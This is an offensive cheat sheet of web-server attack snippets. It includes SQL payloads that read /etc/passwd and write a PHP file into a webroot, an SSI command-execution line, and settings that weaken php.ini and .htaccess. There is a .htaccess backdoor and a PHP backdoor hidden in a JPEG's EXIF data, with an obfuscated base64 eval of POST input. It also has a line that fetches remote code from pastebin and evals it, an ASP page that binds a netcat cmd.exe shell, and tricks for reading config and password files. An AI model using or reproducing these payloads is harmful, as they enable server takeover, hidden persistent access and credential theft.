robots.txt
../

.::[SQL]::.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE table
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform

.::[shtml]::.
<!--#include virtual="symlink.ini"-->
<!--#exec cmd="cat /etc/passwd"-->

.::[php.ini]::.
Safe_mode: OFF
Disable functions : NONE

.::[.htaccess]::.
Options +FollowSymLinks
Options +Indexes
Options FollowSymLinks MultiViews Indexes ExecCGI
Satisfy Any

.::[.htaccess backdoor | https://github.com/wireghoul/htshells ]::.
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
<?php   ?>

.::[EXIF backdoor]::.
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
____bun.jpg
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

.::[Byterun]::.
?><?php $AA = file_get_contents('http://pastebin.com/raw.php?i=TGKgr8EM'); eval(base64_decode($AA)); ?>

.::[Obfuscate]::.
$d=pack('H*','6261736536345f6465636f6465');				//d() = base64_decode()

.::[nc.asp]::.
<%@ Language=VBScript %>
<%
On Error Resume Next
Dim oScript
Dim gURL
gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("D:\Path\nc.exe -l -p 1997 -e cmd.exe -d",1,True)
%>
___________________________________________
.::[Bypass chmod]::.
$ch = curl_init("file:///home/user/public_html/config.php\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
_____
$ch = curl_init("file:///etc/passwd\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
_____
$fd = fopen ("/home/user/public_html/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
_____
copy("compress.zlib:///etc/passwd", "/home/user/public_html//passwd.txt");